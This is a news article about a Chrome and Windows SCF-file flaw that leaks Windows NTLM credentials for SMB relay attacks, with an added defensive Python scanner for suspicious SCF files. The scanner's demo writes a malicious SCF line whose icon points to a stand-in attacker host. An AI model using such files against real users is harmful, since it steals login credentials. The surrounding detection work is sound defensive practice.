A Google Chrome vulnerability allows hackers to steal people's Windows login credentials and launch SMB (Server Message Block) relay attacks, according to security experts. The credential-theft technique combines two older ones: one borrowed from the Stuxnet campaign and the other demonstrated by two security researchers at a Black Hat conference.
The Google Chrome vulnerability was uncovered by DefenceCode security engineer Bosko Stankovic, who said in a blog that he found the flaw in a default configuration of Chrome running on Windows 10.
"Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his web site to be able to proceed and reuse victim's authentication credentials," Stankovic said.
He added that this vulnerability poses a threat not just to privileged users such as administrators but also to regular users and organisations, since "it enables the attacker to impersonate members of the organisation". Hackers can also "immediately reuse" the stolen credentials and gained privileges to launch further attacks "on other users or gain access and control of IT resources".
DefenceCode said it had not informed Google about the vulnerability. However, Google told Threatpost that it was aware of the issue and "taking necessary action."
According to Stankovic, the attack is simple: the victim is tricked into clicking on a malicious link, which triggers an automatic download of a Windows Explorer Shell Command File (SCF file). The SCF file lies dormant until the victim opens the download folder, at which point it attempts to load a Windows icon located on the hacker's server. That request hands the attacker the victim's username and hashed password.
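The mechanism above (an SCF file sitting in the downloads folder whose icon is referenced on a remote host) can be checked for from the defender's side. The following scanner is an added example written for this article; it is not code from DefenceCode or from the article. It parses the INI-style `[Shell]` section of each `.scf` file in a folder, extracts the `IconFile` value, and flags any entry whose icon lives on a UNC host outside an assumed allow-list. The folder contents, the allow-list, and the `attacker.invalid` host name are constructed for the demonstration.

```python
"""Scan a downloads folder for Windows Shell Command (.scf) files whose icon
points at a remote (UNC) host.  Such a file makes Explorer authenticate to
that host as soon as the folder is viewed.  Constructed example, not code
from the article or from DefenceCode."""
import re
import tempfile
from pathlib import Path

# Hosts that Explorer may legitimately fetch icons from; anything else is
# flagged.  The allow-list contents are an assumption for this example.
TRUSTED_HOSTS = {"fileserver.corp.example"}

# Matches a UNC path (\\host\share\...) and captures the host part.
UNC_RE = re.compile(r"^\\\\([^\\]+)\\", re.IGNORECASE)


def parse_scf(text):
    """Return the IconFile value from an SCF file's [Shell] section, or None.

    SCF files are INI-style text: a [Shell] section with Command= and
    IconFile= keys.  Only IconFile matters here, because Explorer resolves
    it (and, for UNC paths, connects to the host) when rendering the folder.
    """
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "shell" and "=" in line:
            key, value = line.split("=", 1)
            if key.strip().lower() == "iconfile":
                return value.strip()
    return None


def remote_icon_host(icon_path):
    """Return the host named in a UNC icon path, or None for local paths."""
    if icon_path is None:
        return None
    m = UNC_RE.match(icon_path)
    return m.group(1).lower() if m else None


def scan_downloads(folder):
    """Return [(path, host)] for every .scf file whose icon lives on an
    untrusted remote host.  A match means that viewing this folder in
    Explorer would send an NTLM challenge-response to that host."""
    findings = []
    for entry in Path(folder).iterdir():
        if entry.suffix.lower() != ".scf" or not entry.is_file():
            continue
        text = entry.read_text(encoding="utf-8", errors="replace")
        host = remote_icon_host(parse_scf(text))
        if host and host not in TRUSTED_HOSTS:
            findings.append((str(entry), host))
    return findings


def demo():
    """Build a constructed downloads folder holding one benign SCF file,
    one suspicious SCF file and one unrelated file, then scan it."""
    with tempfile.TemporaryDirectory() as d:
        # Benign: the classic "Show Desktop" SCF, icon taken from a local binary.
        Path(d, "Show Desktop.scf").write_text(
            "[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"
            "[Taskbar]\r\nCommand=ToggleDesktop\r\n")
        # Suspicious: icon on an external host (constructed placeholder name).
        Path(d, "invoice.scf").write_text(
            "[Shell]\r\nCommand=2\r\nIconFile=\\\\attacker.invalid\\share\\pic.ico\r\n")
        # Not an SCF file at all: must be ignored regardless of content.
        Path(d, "notes.txt").write_text("IconFile=\\\\other.invalid\\x\\y.ico\r\n")
        return scan_downloads(d)


if __name__ == "__main__":
    for path, host in demo():
        print(f"FLAG {path}: icon would be fetched from remote host {host}")
```

Pointing `scan_downloads` at a real user's Downloads directory turns this into a simple periodic check; the same parse-and-classify logic fits into an endpoint agent or a mail-gateway attachment filter, where the unit of interest is the UNC host rather than the file name.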
Threatpost cited independent security researchers as having noted that this flaw is not exclusively tied to how Chrome deals with SCF files; rather, it also relates to how Windows handles them.
"Organisations that allow remote access to services such as Microsoft Exchange (Outlook Anywhere) and use NTLM as authentication method, may be vulnerable to SMB relay attacks, allowing the attacker to impersonate the victim, accessing data and systems without having to crack the password," Stankovic warned.